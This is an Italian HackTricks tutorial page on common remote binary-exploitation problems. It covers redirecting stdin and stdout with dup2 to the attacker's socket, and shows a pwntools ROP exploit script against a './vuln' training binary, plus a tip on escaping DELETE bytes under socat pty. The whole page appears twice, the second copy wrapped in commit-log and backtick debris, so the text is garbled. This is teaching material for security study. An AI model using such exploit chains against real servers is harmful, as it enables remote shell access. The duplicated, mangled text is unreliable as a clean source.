hacktricks/binary-exploitation/common-exploiting-problems.md

# Problemi comuni di sfruttamento

<details>

<summary><strong>Impara l'hacking AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Esperto Red Team AWS di HackTricks)</strong></a><strong>!</strong></summary>

* Lavori in una **azienda di sicurezza informatica**? Vuoi vedere la **tua azienda pubblicizzata su HackTricks**? o vuoi avere accesso all'**ultima versione del PEASS o scaricare HackTricks in PDF**? Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Scopri [**La Famiglia PEASS**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT esclusivi**](https://opensea.io/collection/the-peass-family)
* Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com)
* **Unisciti al** [**💬**](https://emojipedia.org/speech-balloon/) [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguimi** su **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR al** [**repo di hacktricks**](https://github.com/carlospolop/hacktricks) **e al** [**repo di hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## FD in Sfruttamento Remoto

Quando si invia un exploit a un server remoto che chiama **`system('/bin/sh')`** ad esempio, questo verrà eseguito nel processo del server e `/bin/sh` si aspetterà input da stdin (FD: `0`) e stamperà l'output in stdout e stderr (FD `1` e `2`). Quindi l'attaccante non potrà interagire con la shell.

Un modo per risolvere questo problema è supporre che quando il server è stato avviato ha creato il **numero FD `3`** (per l'ascolto) e che poi, la connessione avverrà nel **numero FD `4`**. Pertanto, è possibile utilizzare la syscall **`dup2`** per duplicare lo stdin (FD 0) e lo stdout (FD 1) nel FD 4 (quello della connessione dell'attaccante) in modo da rendere possibile contattare la shell una volta eseguita.

[Esempio di exploit da qui](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):
```python
from pwn import *

elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)

rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()

p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
```
## Socat & pty

Si noti che socat trasferisce già **`stdin`** e **`stdout`** al socket. Tuttavia, la modalità `pty` **include i caratteri DELETE**. Quindi, se invii un `\x7f` (`DELETE`), **cancellerà il carattere precedente** del tuo exploit.

Per aggirare questo problema, **il carattere di escape `\x16` deve essere anteposto a qualsiasi `\x7f` inviato.**

**Qui puoi** [**trovare un esempio di questo comportamento**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.**

<details>

<summary><strong>Impara l'hacking di AWS da zero a esperto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Lavori in una **azienda di sicurezza informatica**? Vuoi vedere la **tua azienda pubblicizzata in HackTricks**? o vuoi avere accesso all'**ultima versione del PEASS o scaricare HackTricks in PDF**? Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT esclusivi**](https://opensea.io/collection/the-peass-family)
* Ottieni il [**PEASS & HackTricks swag ufficiale**](https://peass.creator-spring.com)
* **Unisciti al** [**💬**](https://emojipedia.org/speech-balloon/) [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguimi** su **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR al** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **e al** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-04-07 02:49:58 +00:00			`# Problemi comuni di sfruttamento`

			`<details>`

			`<summary><strong>Impara l'hacking AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Esperto Red Team AWS di HackTricks)</strong></a><strong>!</strong></summary>`

			`* Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata su HackTricks? o vuoi avere accesso all'ultima versione del PEASS o scaricare HackTricks in PDF? Controlla i [PIANI DI ABBONAMENTO](https://github.com/sponsors/carlospolop)!`
			`* Scopri [La Famiglia PEASS](https://opensea.io/collection/the-peass-family), la nostra collezione di [NFT esclusivi](https://opensea.io/collection/the-peass-family)`
			`* Ottieni il [merchandising ufficiale di PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Unisciti al [💬](https://emojipedia.org/speech-balloon/) [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo telegram](https://t.me/peass) o seguimi su Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Condividi i tuoi trucchi di hacking inviando PR al [repo di hacktricks](https://github.com/carlospolop/hacktricks) e al [repo di hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`

			`## FD in Sfruttamento Remoto`

			Quando si invia un exploit a un server remoto che chiama `system('/bin/sh')` ad esempio, questo verrà eseguito nel processo del server e `/bin/sh` si aspetterà input da stdin (FD: `0`) e stamperà l'output in stdout e stderr (FD `1` e `2`). Quindi l'attaccante non potrà interagire con la shell.

			Un modo per risolvere questo problema è supporre che quando il server è stato avviato ha creato il numero FD `3` (per l'ascolto) e che poi, la connessione avverrà nel numero FD `4`. Pertanto, è possibile utilizzare la syscall `dup2` per duplicare lo stdin (FD 0) e lo stdout (FD 1) nel FD 4 (quello della connessione dell'attaccante) in modo da rendere possibile contattare la shell una volta eseguita.

			`[Esempio di exploit da qui](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):`
			```python
			`from pwn import *`

			`elf = context.binary = ELF('./vuln')`
			`p = remote('localhost', 9001)`

			`rop = ROP(elf)`
			`rop.raw('A' * 40)`
			`rop.dup2(4, 0)`
			`rop.dup2(4, 1)`
			`rop.win()`

			`p.sendline(rop.chain())`
			`p.recvuntil('Thanks!\x00')`
			`p.interactive()`
			```
			`## Socat & pty`

			Si noti che socat trasferisce già `stdin` e `stdout` al socket. Tuttavia, la modalità `pty` include i caratteri DELETE. Quindi, se invii un `\x7f` (`DELETE`), cancellerà il carattere precedente del tuo exploit.

			Per aggirare questo problema, il carattere di escape `\x16` deve essere anteposto a qualsiasi `\x7f` inviato.

			`Qui puoi [trovare un esempio di questo comportamento](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit).`

			`<details>`

			`<summary><strong>Impara l'hacking di AWS da zero a esperto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`

			`* Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata in HackTricks? o vuoi avere accesso all'ultima versione del PEASS o scaricare HackTricks in PDF? Controlla i [PIANI DI ABBONAMENTO](https://github.com/sponsors/carlospolop)!`
			`* Scopri [The PEASS Family](https://opensea.io/collection/the-peass-family), la nostra collezione di [NFT esclusivi](https://opensea.io/collection/the-peass-family)`
			`* Ottieni il [PEASS & HackTricks swag ufficiale](https://peass.creator-spring.com)`
			`* Unisciti al [💬](https://emojipedia.org/speech-balloon/) [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo telegram](https://t.me/peass) o seguimi su Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Condividi i tuoi trucchi di hacking inviando PR al [repo hacktricks](https://github.com/carlospolop/hacktricks) e al [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`